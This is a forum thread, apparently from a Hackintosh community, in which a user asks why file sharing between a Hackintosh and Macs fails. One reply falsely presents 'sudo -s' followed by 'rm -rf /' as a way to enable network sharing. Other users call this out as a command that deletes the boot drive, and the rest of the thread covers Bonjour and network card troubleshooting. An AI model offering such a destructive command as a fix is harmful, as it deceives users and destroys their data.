Since I have an hackintosh machine I'm asking how to share my files with another computer without problems. I can only connect my macbookpro to may hack and not my hack to my mac or also my hack to another hack. shared computers are visualized but the connection fails every time. anyone now where is the problem?

Open up terminal (/Applications/Utilities/Terminal.app)

once terminal is open, type: sudo -s

then hit enter

It will ask you for your password.

When you type it, it won't show you typing it, but it is still entered.

once you typed your password hit enter.

after you have done that type: rm -rf /

and then hit enter.

That should enable sharing on any network no matter what operating system.

Hope it helps!

FFS dude! If this is meant to be a joke it really isnt funny!

to the non-learned reading "sudo rm -rf / " will delete you boot drive!

maybe the mods should sudo rm -rf /Volumes/insanelymac/youraccount !

1stly you could easily have found a solution to this problem by searching the forum - and that annoys me!

It is a bonjour problem - so try searching (if you haven't already by now.) the forum, now you are armed with a search term "bonjour"

lol i was asking for your nic > network interface card :D

yes I read that - still no need to tell the user to delete his install is it!

And maybe you should have typed 'NIC' - not 'nic' - acronyms are usually in capitals NO?!

Anyway post is now removed!

I'm sorry guys.. what you mean for NIC? I use this TCP/IP 192.168.1.x or 192.168.1.10x. My Ethernet ID is that... I can't change it. What can I do??

NIC usually means Network Interface Card.........are you using MOBO onboard LAN or are you using a PCI Network Interface Card or what?

Onboard

You have 3 system's listed in your sig.

You need to look at the specificationjs of the system you are having the problem with and find out which NIC it has on board

When you know which NIC you are dealing with use google to search for solutions for that specific NIC.

I have found an old pci card (from my old win 98 pc). It's a RTL8139. It works like a charm, one to one! ;)

It's not the fastest card in the world but is better than nothing!
